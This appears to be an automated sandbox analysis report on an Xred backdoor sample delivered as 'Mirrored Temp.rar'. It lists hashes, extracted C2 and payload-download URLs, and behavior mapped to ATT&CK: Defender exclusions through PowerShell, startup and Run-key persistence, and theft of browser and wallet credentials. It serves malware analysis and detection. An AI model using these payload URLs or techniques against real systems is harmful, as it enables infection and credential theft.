xred | 2a62bb02fdeecca8f59e0ed1f6590d6ca2f09487ff6fb1b06731ca620d7b7d25

Analysis

max time kernel
444s
max time network
442s
platform
windows11-21h2_x64
resource
win11-20241023-en
resource tags

arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system
submitted
08-12-2024 18:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Mirrored Temp.rar
Size

60.7MB
MD5

426dbda31c5464395fdbb8c71578b064
SHA1

62f451e2c9eb9dac92c05d256c8a91a0fe232a11
SHA256

2a62bb02fdeecca8f59e0ed1f6590d6ca2f09487ff6fb1b06731ca620d7b7d25
SHA512

0227e67310a81c8c2d46c7cfb671390173e9d300acc0028589029cb3e8179d650d55ca5b8e470293040c6556d194f1a3386633dde9f901e699af9e4e789cbc9d
SSDEEP

1572864:9YIpD4rytnGkdPmEBvEULWDZDiEPGQ8r7AKOQU7eG:Cvyp4yVL6uEuQ8nTOv7eG

Score

10^/10

xred backdoor credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Extracted

Family

xred

xred.mooo.com

Attributes

email
[email protected]
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

http://xred.site50.net/syn/SUpdate.ini

https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

http://xred.site50.net/syn/Synaptics.rar

https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

http://xred.site50.net/syn/SSLLibrary.dll

Signatures

Xred
Xred is backdoor written in Delphi.
backdoor xred
Xred family
xred

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4324	powershell.exe
940	powershell.exe
332	powershell.exe
3280	powershell.exe
1436	powershell.exe
564	powershell.exe
5456	powershell.exe
5480	powershell.exe
684	powershell.exe
3340	powershell.exe

Drops startup file 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ‎ .scr	Mirrored Temp.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ‎ .scr	Mirrored Temp.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ‎ .scr	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\‎   .scr	Mirrored Temp.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\‎   .scr	Mirrored Temp.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\‎   .scr	attrib.exe

Executes dropped EXE 12 IoCs

pid	Process
1136	Mirrored Temp.exe
1192	Mirrored Temp.exe
4560	bound.exe
4700	._cache_bound.exe
3860	Synaptics.exe
888	._cache_Synaptics.exe
5976	Mirrored Temp.exe
1216	Mirrored Temp.exe
5988	Mirrored Temp.exe
5932	bound.exe
5200	._cache_bound.exe
3480	Mirrored Temp.exe

Loads dropped DLL 64 IoCs

pid	Process
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
4700	._cache_bound.exe
4700	._cache_bound.exe
888	._cache_Synaptics.exe
888	._cache_Synaptics.exe
888	._cache_Synaptics.exe
888	._cache_Synaptics.exe
4700	._cache_bound.exe
4700	._cache_bound.exe
1192	Mirrored Temp.exe
1216	Mirrored Temp.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	bound.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs

Web Service

T1102

flow	ioc
30	discord.com
109	discord.com
10	raw.githubusercontent.com
14	discord.com
40	discord.com
102	raw.githubusercontent.com
104	discord.com
108	discord.com
2	raw.githubusercontent.com
3	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ip-api.com
106	ip-api.com

Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4836	cmd.exe
5280	cmd.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002b017-799.dat	upx
behavioral1/memory/1192-803-0x00007FF835150000-0x00007FF8357B5000-memory.dmp	upx
behavioral1/files/0x001900000002ab5b-805.dat	upx
behavioral1/files/0x001900000002abd4-810.dat	upx
behavioral1/memory/1192-811-0x00007FF849B50000-0x00007FF849B77000-memory.dmp	upx
behavioral1/files/0x001900000002ab59-814.dat	upx
behavioral1/files/0x001900000002ab5f-816.dat	upx
behavioral1/memory/1192-819-0x00007FF846F70000-0x00007FF846F9B000-memory.dmp	upx
behavioral1/memory/1192-817-0x00007FF849C70000-0x00007FF849C89000-memory.dmp	upx
behavioral1/memory/1192-813-0x00007FF84BD70000-0x00007FF84BD7F000-memory.dmp	upx
behavioral1/files/0x001900000002abda-861.dat	upx
behavioral1/files/0x001900000002abd3-860.dat	upx
behavioral1/memory/1192-863-0x00007FF849B40000-0x00007FF849B4F000-memory.dmp	upx
behavioral1/memory/1192-864-0x00007FF846E40000-0x00007FF846E76000-memory.dmp	upx
behavioral1/memory/1192-865-0x00007FF846EE0000-0x00007FF846EED000-memory.dmp	upx
behavioral1/memory/1192-866-0x00007FF846D00000-0x00007FF846D14000-memory.dmp	upx
behavioral1/memory/1192-867-0x00007FF834C10000-0x00007FF835143000-memory.dmp	upx
behavioral1/memory/1192-873-0x00007FF849B50000-0x00007FF849B77000-memory.dmp	upx
behavioral1/memory/1192-872-0x00007FF846CD0000-0x00007FF846CDD000-memory.dmp	upx
behavioral1/memory/1192-871-0x00007FF846430000-0x00007FF8464FE000-memory.dmp	upx
behavioral1/memory/1192-870-0x00007FF846C90000-0x00007FF846CC3000-memory.dmp	upx
behavioral1/memory/1192-869-0x00007FF846CE0000-0x00007FF846CF9000-memory.dmp	upx
behavioral1/memory/1192-868-0x00007FF835150000-0x00007FF8357B5000-memory.dmp	upx
behavioral1/memory/1192-874-0x00007FF846370000-0x00007FF846423000-memory.dmp	upx
behavioral1/memory/1192-875-0x00007FF849B40000-0x00007FF849B4F000-memory.dmp	upx
behavioral1/memory/1192-876-0x00007FF846150000-0x00007FF8461D7000-memory.dmp	upx
behavioral1/memory/1192-879-0x00007FF846D00000-0x00007FF846D14000-memory.dmp	upx
behavioral1/memory/1192-878-0x00007FF846C50000-0x00007FF846C77000-memory.dmp	upx
behavioral1/memory/1192-877-0x00007FF846C80000-0x00007FF846C8B000-memory.dmp	upx
behavioral1/memory/1192-882-0x00007FF834C10000-0x00007FF835143000-memory.dmp	upx
behavioral1/memory/1192-887-0x00007FF846430000-0x00007FF8464FE000-memory.dmp	upx
behavioral1/memory/1192-908-0x00007FF846150000-0x00007FF8461D7000-memory.dmp	upx
behavioral1/memory/1192-907-0x00007FF8423C0000-0x00007FF8423EF000-memory.dmp	upx
behavioral1/memory/1192-906-0x00007FF8423F0000-0x00007FF84241A000-memory.dmp	upx
behavioral1/memory/1192-905-0x00007FF845FD0000-0x00007FF845FDC000-memory.dmp	upx
behavioral1/memory/1192-912-0x00007FF845D40000-0x00007FF845D5C000-memory.dmp	upx
behavioral1/memory/1192-911-0x00007FF845EA0000-0x00007FF845EAA000-memory.dmp	upx
behavioral1/memory/1192-904-0x00007FF845EB0000-0x00007FF845EC2000-memory.dmp	upx
behavioral1/memory/1192-903-0x00007FF845FE0000-0x00007FF845FED000-memory.dmp	upx
behavioral1/memory/1192-902-0x00007FF846040000-0x00007FF84604B000-memory.dmp	upx
behavioral1/memory/1192-901-0x00007FF845FF0000-0x00007FF845FFB000-memory.dmp	upx
behavioral1/memory/1192-900-0x00007FF846030000-0x00007FF84603C000-memory.dmp	upx
behavioral1/memory/1192-899-0x00007FF846050000-0x00007FF84605B000-memory.dmp	upx
behavioral1/memory/1192-898-0x00007FF846060000-0x00007FF84606C000-memory.dmp	upx
behavioral1/memory/1192-897-0x00007FF846370000-0x00007FF846423000-memory.dmp	upx
behavioral1/memory/1192-896-0x00007FF846070000-0x00007FF84607E000-memory.dmp	upx
behavioral1/memory/1192-895-0x00007FF846080000-0x00007FF84608D000-memory.dmp	upx
behavioral1/memory/1192-894-0x00007FF846090000-0x00007FF84609C000-memory.dmp	upx
behavioral1/memory/1192-893-0x00007FF8460A0000-0x00007FF8460AB000-memory.dmp	upx
behavioral1/memory/1192-892-0x00007FF8460B0000-0x00007FF8460BC000-memory.dmp	upx
behavioral1/memory/1192-891-0x00007FF8460C0000-0x00007FF8460CB000-memory.dmp	upx
behavioral1/memory/1192-890-0x00007FF8461F0000-0x00007FF8461FC000-memory.dmp	upx
behavioral1/memory/1192-889-0x00007FF846310000-0x00007FF84631B000-memory.dmp	upx
behavioral1/memory/1192-888-0x00007FF846C40000-0x00007FF846C4B000-memory.dmp	upx
behavioral1/memory/1192-886-0x00007FF846C90000-0x00007FF846CC3000-memory.dmp	upx
behavioral1/memory/1192-885-0x00007FF8460D0000-0x00007FF8460F5000-memory.dmp	upx
behavioral1/memory/1192-884-0x00007FF834A90000-0x00007FF834C0F000-memory.dmp	upx
behavioral1/memory/1192-883-0x00007FF846200000-0x00007FF846218000-memory.dmp	upx
behavioral1/memory/1192-915-0x00007FF8460D0000-0x00007FF8460F5000-memory.dmp	upx
behavioral1/memory/1192-914-0x00007FF8338D0000-0x00007FF833CF5000-memory.dmp	upx
behavioral1/memory/1192-913-0x00007FF834A90000-0x00007FF834C0F000-memory.dmp	upx
behavioral1/memory/1192-916-0x00007FF830920000-0x00007FF831CC7000-memory.dmp	upx
behavioral1/memory/1192-921-0x00007FF841F40000-0x00007FF841F62000-memory.dmp	upx
behavioral1/memory/1192-965-0x00007FF845FE0000-0x00007FF845FED000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bound.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_bound.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bound.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_bound.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2032	netsh.exe
1644	netsh.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1360	WMIC.exe
3592	WMIC.exe

Enumerates system info in registry 2 TTPs 18 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	._cache_bound.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	._cache_bound.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	._cache_Synaptics.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	._cache_bound.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	._cache_bound.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	._cache_bound.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	._cache_Synaptics.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	._cache_bound.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	._cache_Synaptics.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\TypedURLs	._cache_bound.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\TypedURLs	._cache_bound.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\TypedURLs	._cache_Synaptics.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133781549093666673"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 10 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	bound.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4248760313-3670024077-2384670640-1000\{C34D9006-647F-43A5-90FF-2976AFEA63B0}	Mirrored Temp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	bound.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Synaptics.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4248760313-3670024077-2384670640-1000\{2E67924B-A01C-4C6B-91BA-46951FFA0F35}	Mirrored Temp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4752	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 47 IoCs

pid	Process
1976	chrome.exe
1976	chrome.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
684	powershell.exe
1192	Mirrored Temp.exe
1192	Mirrored Temp.exe
4324	powershell.exe
684	powershell.exe
4324	powershell.exe
940	powershell.exe
940	powershell.exe
332	powershell.exe
332	powershell.exe
3340	powershell.exe
3340	powershell.exe
2712	chrome.exe
2712	chrome.exe
3420	7zFM.exe
3420	7zFM.exe
1360	chrome.exe
1360	chrome.exe
1360	chrome.exe
1360	chrome.exe
1216	Mirrored Temp.exe
1216	Mirrored Temp.exe
1216	Mirrored Temp.exe
1216	Mirrored Temp.exe
5456	powershell.exe
5456	powershell.exe
3280	powershell.exe
3280	powershell.exe
5456	powershell.exe
3280	powershell.exe
1436	powershell.exe
1436	powershell.exe
1436	powershell.exe
564	powershell.exe
564	powershell.exe
564	powershell.exe
5480	powershell.exe
5480	powershell.exe
5480	powershell.exe
3420	7zFM.exe
3420	7zFM.exe
3420	7zFM.exe
3420	7zFM.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3420	7zFM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs

pid	Process
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	3420	7zFM.exe
Token: 35	3420	7zFM.exe
Token: SeSecurityPrivilege	3420	7zFM.exe
Token: SeSecurityPrivilege	3420	7zFM.exe
Token: SeDebugPrivilege	1192	Mirrored Temp.exe
Token: SeShutdownPrivilege	1976	chrome.exe
Token: SeCreatePagefilePrivilege	1976	chrome.exe
Token: SeShutdownPrivilege	1976	chrome.exe
Token: SeCreatePagefilePrivilege	1976	chrome.exe
Token: SeShutdownPrivilege	1976	chrome.exe
Token: SeCreatePagefilePrivilege	1976	chrome.exe
Token: SeDebugPrivilege	684	powershell.exe
Token: SeDebugPrivilege	4324	powershell.exe
Token: SeDebugPrivilege	940	powershell.exe
Token: SeDebugPrivilege	332	powershell.exe
Token: SeDebugPrivilege	3340	powershell.exe
Token: SeDebugPrivilege	4700	._cache_bound.exe
Token: SeDebugPrivilege	888	._cache_Synaptics.exe
Token: SeIncreaseQuotaPrivilege	2808	WMIC.exe
Token: SeSecurityPrivilege	2808	WMIC.exe
Token: SeTakeOwnershipPrivilege	2808	WMIC.exe
Token: SeLoadDriverPrivilege	2808	WMIC.exe
Token: SeSystemProfilePrivilege	2808	WMIC.exe
Token: SeSystemtimePrivilege	2808	WMIC.exe
Token: SeProfSingleProcessPrivilege	2808	WMIC.exe
Token: SeIncBasePriorityPrivilege	2808	WMIC.exe
Token: SeCreatePagefilePrivilege	2808	WMIC.exe
Token: SeBackupPrivilege	2808	WMIC.exe
Token: SeRestorePrivilege	2808	WMIC.exe
Token: SeShutdownPrivilege	2808	WMIC.exe
Token: SeDebugPrivilege	2808	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2808	WMIC.exe
Token: SeRemoteShutdownPrivilege	2808	WMIC.exe
Token: SeUndockPrivilege	2808	WMIC.exe
Token: SeManageVolumePrivilege	2808	WMIC.exe
Token: 33	2808	WMIC.exe
Token: 34	2808	WMIC.exe
Token: 35	2808	WMIC.exe
Token: 36	2808	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2808	WMIC.exe
Token: SeSecurityPrivilege	2808	WMIC.exe
Token: SeTakeOwnershipPrivilege	2808	WMIC.exe
Token: SeLoadDriverPrivilege	2808	WMIC.exe
Token: SeSystemProfilePrivilege	2808	WMIC.exe
Token: SeSystemtimePrivilege	2808	WMIC.exe
Token: SeProfSingleProcessPrivilege	2808	WMIC.exe
Token: SeIncBasePriorityPrivilege	2808	WMIC.exe
Token: SeCreatePagefilePrivilege	2808	WMIC.exe
Token: SeBackupPrivilege	2808	WMIC.exe
Token: SeRestorePrivilege	2808	WMIC.exe
Token: SeShutdownPrivilege	2808	WMIC.exe
Token: SeDebugPrivilege	2808	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2808	WMIC.exe
Token: SeRemoteShutdownPrivilege	2808	WMIC.exe
Token: SeUndockPrivilege	2808	WMIC.exe
Token: SeManageVolumePrivilege	2808	WMIC.exe
Token: 33	2808	WMIC.exe
Token: 34	2808	WMIC.exe
Token: 35	2808	WMIC.exe
Token: 36	2808	WMIC.exe
Token: SeShutdownPrivilege	2712	chrome.exe
Token: SeCreatePagefilePrivilege	2712	chrome.exe
Token: SeIncreaseQuotaPrivilege	4808	wmic.exe
Token: SeSecurityPrivilege	4808	wmic.exe

Suspicious use of FindShellTrayWindow 57 IoCs

pid	Process
3420	7zFM.exe
3420	7zFM.exe
3420	7zFM.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
3420	7zFM.exe
3420	7zFM.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
1976	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe
2712	chrome.exe

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
4752	EXCEL.EXE
4752	EXCEL.EXE
4752	EXCEL.EXE
4752	EXCEL.EXE
4752	EXCEL.EXE
4752	EXCEL.EXE
4752	EXCEL.EXE
4752	EXCEL.EXE
3468	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3420 wrote to memory of 1136	3420	7zFM.exe	80
PID 3420 wrote to memory of 1136	3420	7zFM.exe	80
PID 1136 wrote to memory of 1192	1136	Mirrored Temp.exe	83
PID 1136 wrote to memory of 1192	1136	Mirrored Temp.exe	83
PID 1976 wrote to memory of 4156	1976	chrome.exe	85
PID 1976 wrote to memory of 4156	1976	chrome.exe	85
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
